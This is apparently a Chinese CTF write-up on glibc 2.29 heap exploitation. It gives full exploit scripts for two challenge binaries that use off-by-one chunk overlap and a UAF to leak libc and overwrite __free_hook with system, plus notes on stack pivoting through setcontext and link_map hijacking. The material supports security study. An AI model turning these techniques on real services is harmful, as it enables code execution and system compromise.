glibc-2.29

2019 湖湘杯线下 pwn2

off by one ，可以修改size，形成chunk overlap。（好像没用到新保护机制）

#-*- coding:utf-8 -*-
from PwnContext import *

try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')

#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
s       = lambda data               :ctx.send(str(data))
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))

debugg = 1
logg = 0
ctx.binary = './pwn2'
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

ctx.symbols = {'lst':0x4060}

if debugg:
    rs()

if logg:
    context.log_level='debug'
def add(idx,sz,c):
    sla('> ',1)
    sla('idx:',idx)
    sla('size:',sz)
    sa('cnt:',c)
def free(idx):
    sla('> ',2)
    sla('idx:',idx)
def edit(idx,c):
    sla('> ',3)
    sla('idx:',idx)
    sa('cnt:',c)
def show(idx):
    sla('> ',4)
    sla('idx:',idx)
def backdoor(c):
    sla('> ',5)
    sa('Because I know you are 666!',c)
add(1,0x88,'a'*0x88)
add(2,0x428,'a'*0x428)
add(0,0x80,'a'*0x80)
add(3,0x233,'a'*0x233)
add(4,0x428,'a'*0x428)
add(5,0x88,'/bin/sh\x00'+'\n')
edit(1,'a'*0x88+p16(0xb31))
free(3)
free(2)
add(6,0x428,'c'*16+'\n')
show(0)
lb = uu64(ru('\x7f',drop=False))-0x1e4ca0
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(lb))
add(7,0x100,'a'*0x88+p64(0x241)+p64(fh)[:7]+'\n')

backdoor('b'*8)
backdoor(p64(sys))
free(5)

irt()

D^3CTF new_heap

没有设置setbuf(stdin,0)缓冲区，利用getchar()申请malloc(0x1000)构成UAF的巧用。

#-*- coding:utf-8 -*-
from PwnContext import *

try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')

#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
s       = lambda data               :ctx.send(str(data))
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))

debugg = 1
logg = 0
ctx.binary = './new_heap'
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

ctx.symbols = {'lst':0x202060}

if debugg:
    rs()
if logg:
    context.log_level='debug'
def add(sz,c):
    sla('3.exit',1)
    sla('size:',sz)
    sa('content:',c)
def free(idx):
    sla('3.exit',2)
    sla('index:',idx)
    
ru('good present for African friends:')
low_heap = int(ru('\n',drop=True),16)
success(hex(low_heap))

add(0x78,'0')
add(0x78,'1')
add(0x78,'2')
add(0x78,'3')
add(0x78,'4')
add(0x78,'5')
add(0x78,'6')
add(0x78,'7')
for i in range(7):
    free(i)
free(7)
sla('3.exit',3)#7
sl('a')#malloc(0x1000)
add(0x10,'8')#top chunk

free(7)
add(0x68,'9')
add(0x68,'10')
add(0x68,'11')
free(11)
free(10)
free(7)#free(7) or free(9)

sla('3.exit',3)#7
sla('sure?','a'*0x30)
fd = low_heap>>4<<12 | 0x730 #libc
sla('3.exit',3)#7
sa('sure?',p16(fd))
stdout = 0x1760
dbg()
ipy()

add(0x20,p16(stdout))
add(0x68,'13')#13
add(0x68,'14')#14
add(0x68,p64(0xfbad1800)+p64(0)*3+'\xc8')
lb = uu64(r(6))-0x1e4a00
success(hex(lb))

free(7)
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
add(0x68,'/bin/sh\x00')#16
add(0x68,p64(sys))
free(16)

irt()

然而在我们控了free_hook以后，我们发现libc-2.29中没有可以利用rdi控制rsp进行迁栈的gadget，所以使用了其它方法。IO_wfile_sync函数可以利用rdi控制rdx，函数setcontext+0x35处可以用rdx控rsp，两个搭配使用就可以进行迁栈。在IO_wfile_sync+0x6d处有call [r12+0x20]，这里的r12也是可以用rdi控制的，所以可以利用这条指令调用setcontext+0x35，实现free_hook -> IO_wfile_sync -> setcontext+0x35。https://www.anquanke.com/post/id/210160

劫持link_map

1、smallbin attack 攻击global_max_fast

2、fastbin attack 劫持topchunk

3、伪造link_map结构，调用setcontext+0x3d

4、ROP

https://www.anquanke.com/post/id/211331